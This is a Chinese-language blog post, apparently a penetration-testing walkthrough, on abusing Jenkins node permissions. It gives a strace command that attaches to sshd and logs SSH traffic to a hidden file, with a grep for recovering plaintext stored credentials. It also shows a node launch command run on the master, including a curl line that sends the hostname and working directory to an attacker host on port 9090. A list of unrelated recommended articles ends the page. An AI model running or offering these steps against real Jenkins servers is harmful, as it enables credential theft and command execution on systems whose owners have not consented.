Jenkins :添加node权限获取凭据、执行命令

拥有Jenkins agent权限的账号可以对node节点进行操作,通过添加不同的node可以让流水线项目在不同的节点上运行,安装Jenkins的主机默认作为master节点。

1.Jenkins 添加node获取明文凭据

通过添加node节点,本地监听ssh认证,选则凭据(明文)进行ssh认证,拿到密码。

1.新建节点-manage nodes功能

2.填写工作目录,选择通过SSH进行远程节点身份认证,选择抓取带*号的凭据,host key选择不进行验证:

3.主机监听:这里监听主机ssh使用的是strace后门,实际也可以使用其他方式进行:

复制代码
(strace -f -F -p `ps aux|grep "sshd -D"|grep -v grep|awk {'print $2'}` -t -e trace=read,write -s 32 2> /tmp/.sshd.log &)

4.保存节点配置, Jenkins将对主机进行ssh请求:

node节点认证日志(账号密码方式):

  1. 查看接受结果,这种方式获得的密码需要自行判断下起始位置

    grep -E 'read\(6, ".+\0\0\0\.+"' /tmp/.sshd.log

2.通过添加节点执行命令

同样的,在添加节点时可以配置在master上执行命令去进行其他节点认证,也就可以在master上执行恶意命令了。

注意:这里执行curl命令时不能使用````````直接执行系统命令,所以利用时需要更换其他方式。

复制代码
curl -k ip:9090/`hostname`/`pwd`
env

添加节点时也可以从控制器执行命令,Launch method 选择 通过在master上执行命令的方式:

保存然后launch agent:

可以在Log里面看到命令env的输出:

相关推荐
数据与人工智能律师2 分钟前
解码Web3:DeFi、GameFi、SocialFi的法律风险警示与合规路径
大数据·网络·人工智能·云计算·区块链
IT_陈寒6 分钟前
React 性能优化:5个实战技巧让首屏加载提升50%,开发者亲测有效!
前端·人工智能·后端
CryptoRzz9 分钟前
欧美(美股、加拿大股票、墨西哥股票)股票数据接口文档
java·服务器·开发语言·数据库·区块链
xingxing_F15 分钟前
Network Radar for Mac 网络扫描管理软件
网络·macos
wanhengidc19 分钟前
巨椰云手机引领未来
运维·服务器·网络·游戏·智能手机
rising start23 分钟前
前端基础一、HTML5
前端·html·html5
java1234_小锋26 分钟前
TensorFlow2 Python深度学习 - TensorFlow2框架入门 - 使用Keras.Model来定义模型
python·深度学习·tensorflow·tensorflow2
杂货铺的小掌柜28 分钟前
apache poi excel 字体数量限制
java·excel·poi
Learn Beyond Limits30 分钟前
TensorFlow Implementation of Content-Based Filtering|基于内容过滤的TensorFlow实现
人工智能·python·深度学习·机器学习·ai·tensorflow·吴恩达
java1234_小锋31 分钟前
TensorFlow2 Python深度学习 - 函数式API(Functional API)
python·深度学习·tensorflow·tensorflow2